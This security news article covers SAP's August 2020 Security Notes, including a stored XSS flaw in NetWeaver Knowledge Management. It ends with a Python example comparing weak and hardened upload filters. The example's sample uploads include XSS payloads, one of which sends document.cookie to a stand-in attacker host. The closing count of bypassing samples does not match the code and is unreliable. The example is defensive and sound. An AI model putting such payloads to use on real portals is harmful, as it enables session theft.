SAP Announced 15 New Security Notes Including Vulnerabilities In NetWeaver (Cybers Guards)

SAP has released 15 new Security Notes on its August 2020 Security Patch Day, several of them addressing vulnerabilities in NetWeaver.

The most important of these is a cross-site scripting (XSS) flaw in NetWeaver's Knowledge Management feature. Knowledge Management, a default component of all SAP Enterprise Portal installations, allows users to manage multiple data sources, create and edit content and folders, and upload files. The upload feature, ERP cyber-security vendor Onapsis disclosed, could be abused to upload malicious HTML files containing JavaScript code in order to carry out a stored XSS attack. The root cause was an ineffective filtering mechanism that was meant to prevent the upload of files containing executable code.

Tracked as CVE-2020-6284 and rated Hot News, the issue has a CVSS score of 9.0. Successful exploitation requires that a user with administrative privileges open the malicious file, which is what brings the score down to 9.0; otherwise it would have been 9.9.

Another Hot News Security Note released on this Patch Day is an update to a July 2020 Security Note addressing a critical bug (CVSS score 10) in NetWeaver AS JAVA (LM Configuration Wizard), tracked as CVE-2020-6287 and also known as RECON (Remotely Exploitable Code On NetWeaver).

SAP also released three High Priority Security Notes on the August 2020 Security Patch Day addressing vulnerabilities in NetWeaver: CVE-2020-6296 (CVSS score 8.3), code injection in NetWeaver (ABAP) and ABAP Platform; CVE-2020-6309 (CVSS score 7.5), missing authentication in NetWeaver AS Java; and CVE-2020-6293 (CVSS score 7.3), unrestricted file upload in NetWeaver (Knowledge Management).

According to Onapsis, if the fix for the Knowledge Management Hot News bug is not applied, CVE-2020-6293, which allows an attacker to create, change or delete files in the Knowledge Management component, can be exploited without authentication. That raises its CVSS score to 9.6 and makes it a critical bug. In other words, the two Knowledge Management notes should be applied together, not in isolation.

SAP also released two High Priority Security Notes patching missing authorization checks, one in BusinessObjects Business Intelligence Platform (CVE-2020-6294, CVSS score 8.5) and one in Banking Services (Generic Market Data) (CVE-2020-6298, CVSS score 8.3), plus a further High Priority note for Adaptive Server Enterprise (CVSS score 7). Exploitation of these bugs may lead to denial of service, leakage of mouse and keyboard activity and the ability to record screenshots, reading Secure Business Partner Generic Market Data (GMD), or reading information from the installation log file.

All remaining Security Notes released on the August 2020 Security Patch Day address medium priority bugs, including XSS vulnerabilities in SAP Commerce, in the jQuery library bundled with SAPUI5 (an update), and in BusinessObjects Business Intelligence Platform (Central Management Console); information disclosure in Data Intelligence, NetWeaver (ABAP Server) and ABAP Platform; and missing authorization checks in ERP (HCM Travel Management) and S/4HANA (Fiori UI for General Ledger Accounting).
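The Knowledge Management bug comes down to an upload filter that was supposed to keep executable content out of the portal and did not. The following is an added illustration, not SAP's or Onapsis's code and not a description of the actual SAP filter: a weak extension denylist of the kind that commonly fails (case, alternative extensions, content that does not match the extension), placed beside a hardened handler that allowlists extensions, checks magic bytes, and serves stored files with headers that stop the browser rendering them inline. The sample uploads, the extension lists and the header set are all assumptions chosen for the example.

```python
"""Weak extension denylist vs. hardened upload handling for a file store.
Added illustration only: not SAP's code; filters, samples and headers are assumptions."""
import os
import re

# Constructed sample uploads: (filename, first bytes of content).
SAMPLE_UPLOADS = [
    ("report.pdf", b"%PDF-1.4\n%..."),
    ("logo.png", b"\x89PNG\r\n\x1a\n...."),
    ("payload.html", b"<script>fetch('//evil.example/'+document.cookie)</script>"),
    ("PAYLOAD.HTML", b"<script>alert(1)</script>"),       # case bypass
    ("payload.svg", b"<svg onload=\"alert(1)\"></svg>"),  # extension not on denylist
    ("report.pdf", b"<html><script>alert(1)</script>"),  # content does not match extension
]

# --- Weak approach: block a short list of "executable" extensions -------------
DENYLIST = {".html", ".js"}


def weak_filter(filename: str) -> bool:
    """Accepts anything whose extension is not on the denylist (case-sensitive).
    Misses uppercase extensions, SVG/XHTML, and files whose bytes are HTML anyway."""
    return os.path.splitext(filename)[1] not in DENYLIST


# --- Hardened approach: allowlist, magic-byte check, safe storage name ----------
ALLOWLIST = {".pdf", ".png", ".txt"}
MAGIC = {".pdf": b"%PDF-", ".png": b"\x89PNG\r\n\x1a\n"}
SAFE_NAME = re.compile(r"[^A-Za-z0-9._-]")


def hardened_filter(filename: str, content: bytes) -> bool:
    """Accept only allowlisted extensions whose leading bytes match the type."""
    name = os.path.basename(filename)          # drop any path component
    ext = os.path.splitext(name)[1].lower()    # normalise case before comparing
    if ext not in ALLOWLIST:
        return False
    expected = MAGIC.get(ext)
    if expected is not None and not content.startswith(expected):
        return False                           # extension lies about the content
    return True


def download_headers(filename: str) -> dict:
    """Headers for serving a stored upload so the browser never renders it as HTML.
    Even if a script-bearing file slips through, it is downloaded, not executed
    in the portal's origin."""
    safe = SAFE_NAME.sub("_", os.path.basename(filename))
    return {
        "Content-Type": "application/octet-stream",
        "Content-Disposition": f'attachment; filename="{safe}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


def classify(samples=SAMPLE_UPLOADS) -> list:
    """Return (filename, accepted_by_weak, accepted_by_hardened) for each sample."""
    return [(n, weak_filter(n), hardened_filter(n, c)) for n, c in samples]


if __name__ == "__main__":
    for name, weak, hard in classify():
        print(f"{name:14s} weak={'accept' if weak else 'reject':6s} "
              f"hardened={'accept' if hard else 'reject'}")
```

Running the block shows the denylist accepting four of the five hostile samples while the allowlist plus magic-byte check rejects all of them. The download headers are the second layer: a stored XSS through an upload only works if the server hands the file back with a renderable content type in the application's own origin, so forcing `attachment`, `nosniff` and a sandboxing CSP on the download path removes the payoff even when the filter is wrong.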
